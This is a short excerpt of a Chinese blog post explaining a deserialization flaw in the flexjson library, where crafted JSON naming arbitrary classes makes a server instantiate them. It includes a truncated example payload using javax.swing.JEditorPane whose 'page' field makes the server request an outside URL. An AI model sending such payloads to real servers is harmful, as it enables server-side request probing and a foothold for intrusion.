flexjson反序列化漏洞
这里写目录标题引言代码如下:
引言
flexjson 在反序列化时,flexjson自身没有任何控制,可以导致,客户端构造任意类型的序列化json数据,导致服务端反序列化时,触发恶意类的初始化,威胁服务端安全,如下例子 使用javax.swing.JEditorPane 类,通过其page属性的初始化,可以进行任意url嗅探,同样的可以利用
String json5 = “{“class”:“javax.swing.JEditorPane”,“page”:“http://ddd.wanghao723.ns.
原创
2022-03-28 16:55:06 ·
1100 阅读 ·
0 评论